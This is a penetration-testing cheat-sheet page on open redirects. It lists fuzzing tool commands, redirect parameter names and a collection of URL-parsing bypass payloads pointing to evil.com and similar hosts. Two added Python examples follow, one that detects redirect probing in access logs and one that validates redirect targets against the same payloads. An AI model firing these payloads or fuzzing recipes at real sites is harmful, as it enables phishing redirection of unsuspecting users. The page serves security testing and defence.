Pentest Book
Open redirects

Tools

# https://github.com/devanshbatham/OpenRedireX
python3 openredirex.py -u "https://website.com/?url=FUZZ" -p payloads.txt --keyword FUZZ

# https://github.com/0xNanda/Oralyzer
python3 oralyzer.py -u https://website.com/redir?url=

# Payload generator
# https://gist.github.com/zPrototype/b211ae91e2b082420c350c28b6674170

Payloads

# Check for
=aHR0
=http
# https://github.com/m0chan/BugBounty/blob/master/OpenRedirectFuzzing.txt

https://web.com/r/?url=https://phising-malicious.com
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect

# Check redirects
https://url.com/redirect/?url=http://twitter.com/
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
/http://twitter.com/
/\\twitter.com
/\/twitter.com
?c=.twitter.com/
/?redir=google。com
//google%E3%80%82com
//google%00.com
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\victim.com:80%40google.com
https://target.com///google.com//
# Remember to URL-encode the payloads!

# Search in Burp:
"=http" or "=aHR0" (aHR0 is how base64-encoded "http..." begins)

# Fuzzing open redirect

# Intruder url open redirect
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

# Valid URLs:
http(s)://evil.com
http(s):\\evil.com
//evil.com
///evil.com
/\evil.com
\/evil.com
/\/evil.com
\\evil.com
\/\evil.com
/ /evil.com
\ \evil.com

# Oneliner with gf
echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
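The "=http" / "=aHR0" search tip and the Intruder parameter list above double as a detection rule for the blue team: the same parameter names and value shapes show up in access logs when someone is probing for an open redirect. The following is an added example, not code from the Pentest Book; the access-log lines and IP addresses are constructed, and the parameter names are taken from the list above.

```python
"""Flag open-redirect probing in web server access logs.

Added example, not code from the Pentest Book. The log lines are constructed;
the parameter names are the Intruder list above and the value heuristics are
the "=http" / "=aHR0" search tip (aHR0 is how base64 of "htt..." begins).
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Query parameter names from the Intruder list above.
REDIRECT_PARAMS = {
    "next", "url", "target", "rurl", "dest", "destination", "redir",
    "redirect_uri", "redirect_url", "redirect", "view", "to", "image_url",
    "go", "return", "returnTo", "return_to", "checkout_url", "continue",
    "return_path",
}

# Apache/nginx combined log format; only the fields the check needs are named.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Leading byte sequences from the "Valid URLs" list above that browsers read as
# "go to another host" even though they do not start with a scheme.
_EXTERNAL_PREFIXES = ("//", "/\\", "\\/", "\\\\", "/ /", "\\ \\")


def looks_external(value):
    """True if a (once-decoded) parameter value points off-site or carries a parser trick."""
    # Check the value as received and once more decoded, to catch double encoding.
    for s in (value, unquote(value)):
        t = s.lstrip()
        if t.lower().startswith(("http:", "https:")):
            return True
        if t.startswith(_EXTERNAL_PREFIXES):
            return True
        # Tab/CR/LF/NUL and non-ASCII (fullwidth dot) are the parser-confusion payloads.
        if any(ch in s for ch in "\t\r\n\x00") or not s.isascii():
            return True
    # Base64 of any string starting with "htt" begins with "aHR0".
    return value.startswith("aHR0")


def find_redirect_probes(lines):
    """Return (ip, status, param, value) for each request whose redirect parameter looks external."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qsl URL-decodes once, exactly as the application framework would.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in REDIRECT_PARAMS and looks_external(value):
                hits.append((m["ip"], m["status"], name, value))
    return hits


# Constructed sample: one legitimate redirect, one unrelated parameter, and four probes
# (protocol-relative, %2F%5C backslash, base64 of "https://evil.example/", double-encoded tab).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /login?next=/account HTTP/1.1" 302 0
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /login?next=//evil.example/ HTTP/1.1" 302 0
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /redir?url=%2F%5Cevil.example HTTP/1.1" 302 0
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /out?url=aHR0cHM6Ly9ldmlsLmV4YW1wbGUv HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=http://docs.example HTTP/1.1" 200 4096
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /login?next=%2F%2509%2Fevil.example HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for hit in find_redirect_probes(SAMPLE_LOG.splitlines()):
        print(hit)
```

The status code is kept in each hit on purpose: a 302 on a flagged value means the application actually followed the attacker-controlled target, which is the case worth paging on, while a 200 or 4xx is a probe that did not land. The `q=http://docs.example` line is deliberately not flagged, since the heuristic only looks at the redirect-style parameter names.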
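On the fixing side, the bypass list above makes a good regression suite for a server-side redirect check. The following is an added example, not code from the Pentest Book or any of the linked tools. It assumes the web framework has already URL-decoded the parameter once; `own.example`, `evil.example`, the allowlist and `BYPASS_VECTORS` are constructed (the vectors are decoded forms of the payloads above, plus a userinfo and a subdomain trick).

```python
"""Allowlist-based redirect validation that holds up against the bypass list above.

Added example (not code from the Pentest Book or the linked tools). `own_host`,
`allowed_hosts` and the test vectors are constructed; `target` is assumed to be
the query parameter *after* the web framework has URL-decoded it once.
"""
from urllib.parse import urlsplit, urljoin

# Only printable ASCII without space or backslash survives. That single rule removes
# the tab (%09), NUL (%00), CR/LF, fullwidth dot (%E3%80%82) and every "\" variant
# from the list. Python's urlsplit silently drops tab/CR/LF and treats "\" as an
# ordinary character, while browsers read "/\host" as "//host"; a validator must
# never rely on a parse the browser will disagree with, so the filter runs first.
_ALLOWED_CHARS = frozenset(chr(c) for c in range(0x21, 0x7F)) - {"\\"}


def safe_redirect_target(target, own_host, allowed_hosts=(), default="/"):
    """Return an absolute URL on own_host/allowed_hosts, or `default` if unsafe."""
    if not target or not set(target) <= _ALLOWED_CHARS:
        return default
    try:
        parts = urlsplit(target)
    except ValueError:  # e.g. a malformed IPv6 literal such as "http://[evil"
        return default

    if not parts.scheme and not parts.netloc:
        # Relative target: require exactly one leading slash. "//host" and
        # "///host" are protocol-relative. Bare "host" or ".host" is rejected
        # here as well; same-origin paths are the only relative form accepted.
        if not target.startswith("/") or target.startswith("//"):
            return default
        return urljoin(f"https://{own_host}/", target)

    # Absolute target: http(s) only, and the *parsed* host must be an exact
    # allowlist member. `.hostname` drops userinfo and the port, so
    # "https://own.example@evil.example/" is judged by "evil.example", and
    # "https://own.example.evil.example/" fails the exact match.
    if parts.scheme not in ("http", "https"):
        return default
    allowed = {own_host.lower(), *(h.lower() for h in allowed_hosts)}
    if parts.hostname is None or parts.hostname not in allowed:
        return default
    return target


# Decoded forms of payloads from the list above plus userinfo/subdomain tricks;
# every one of them must come back as `default`.
BYPASS_VECTORS = [
    "https://evil.example",
    "//evil.example",
    "///evil.example",
    "/\\evil.example",
    "\\/evil.example",
    "\\\\evil.example",
    "/ /evil.example",
    "//evil.example/%2f%2e%2e",
    "//google\x00.com",
    "/\t/google.com",
    "/\\victim.com:80@google.com",
    "google\u3002com",
    "https://own.example@evil.example/",
    "https://own.example.evil.example/",
    "javascript:alert(1)",
    "http://[evil",
]


def rejected_vectors(own_host="own.example"):
    """Return the subset of BYPASS_VECTORS that the validator refuses."""
    return [v for v in BYPASS_VECTORS if safe_redirect_target(v, own_host) == "/"]


if __name__ == "__main__":
    assert rejected_vectors() == BYPASS_VECTORS
    print(safe_redirect_target("/account?tab=1", "own.example"))
    print(safe_redirect_target("/http://twitter.com/", "own.example"))
```

Note that `/http://twitter.com/` from the list is accepted and rewritten to `https://own.example/http://twitter.com/`: as a same-origin path it is harmless, and the page lists it only because some applications strip the leading slash or concatenate the value into a new URL. Matching is done on `parts.hostname` rather than with a string prefix or `startswith(own_host)`, because the hostname is what the browser will actually connect to.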
Last modified 9mo ago